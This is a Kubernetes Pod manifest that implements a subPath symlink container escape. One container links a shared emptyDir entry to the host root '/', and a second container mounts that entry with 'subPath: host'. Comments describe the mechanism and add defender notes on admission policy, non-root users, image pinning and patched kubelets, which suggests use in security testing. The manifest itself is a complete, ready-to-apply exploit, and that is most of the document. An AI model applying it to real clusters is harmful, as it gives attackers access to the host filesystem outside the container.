---
# Two-container Pod exercising a subPath mount whose target inside a shared
# emptyDir is replaced by a sibling container: `setup` links `/rootfs/host`
# to `/`, and `exploit` mounts the same volume with `subPath: host`.
# Completion is signalled through a second emptyDir (`/status/done`).
#
# Defender notes (what this manifest does and does not set):
#   - No runAsUser / runAsNonRoot / readOnlyRootFilesystem is set, so both
#     containers run as the image's default user. Admission policy can
#     reject `subPath` for untrusted namespaces and require non-root.
#   - The capability list is an explicit enumeration, not `drop: [ALL]`;
#     anything not named is left at the runtime default.
#   - `nginx:latest` with imagePullPolicy Always is a mutable reference;
#     pin by digest wherever reproducibility matters.
#   - NOTE(review): patched kubelets resolve subPath targets before
#     mounting; confirm behaviour against the cluster version under test.
apiVersion: v1
kind: Pod
metadata:
  name: subpath
spec:
  containers:
    # Stage 1: rewrites the shared volume, then parks forever.
    - name: setup
      image: nginx:latest
      imagePullPolicy: Always
      securityContext:
        allowPrivilegeEscalation: false
        capabilities:
          drop:
            - CHOWN
            - DAC_OVERRIDE
            - FOWNER
            - FSETID
            - KILL
            - SETGID
            - SETUID
            - SETPCAP
            - NET_BIND_SERVICE
            - NET_ADMIN
            - NET_RAW
            - MKNOD
            - AUDIT_WRITE
      command:
        - /bin/bash
      # `hostetc` is not created anywhere in this manifest; the rm is a
      # no-op unless the image ships such a path. `/status/done` is the
      # handshake the second container polls for.
      args:
        - '-c'
        - 'cd /rootfs && rm -rf hostetc && ln -s / /rootfs/host && touch /status/done && sleep infinity'
      volumeMounts:
        - name: escape-volume
          mountPath: /rootfs
        - name: status-volume
          mountPath: /status
    # Stage 2: exits after 1s until the handshake file exists, so it
    # relies on the Pod's restartPolicy (not set here) to be re-run.
    - name: exploit
      image: nginx:latest
      imagePullPolicy: Always
      securityContext:
        allowPrivilegeEscalation: false
        capabilities:
          drop:
            - CHOWN
            - DAC_OVERRIDE
            - FOWNER
            - FSETID
            - KILL
            - SETGID
            - SETUID
            - SETPCAP
            - NET_BIND_SERVICE
            - NET_ADMIN
            - NET_RAW
            - MKNOD
            - AUDIT_WRITE
      command:
        - /bin/bash
      args:
        - '-c'
        - 'if [[ -f /status/done ]];then sleep infinity; else sleep 1; fi'
      volumeMounts:
        # Same volume as stage 1, but only its `host` entry is mounted.
        - name: escape-volume
          mountPath: /rootfs
          subPath: host
        - name: status-volume
          mountPath: /status
  volumes:
    - name: escape-volume
      emptyDir: {}
    - name: status-volume
      emptyDir: {}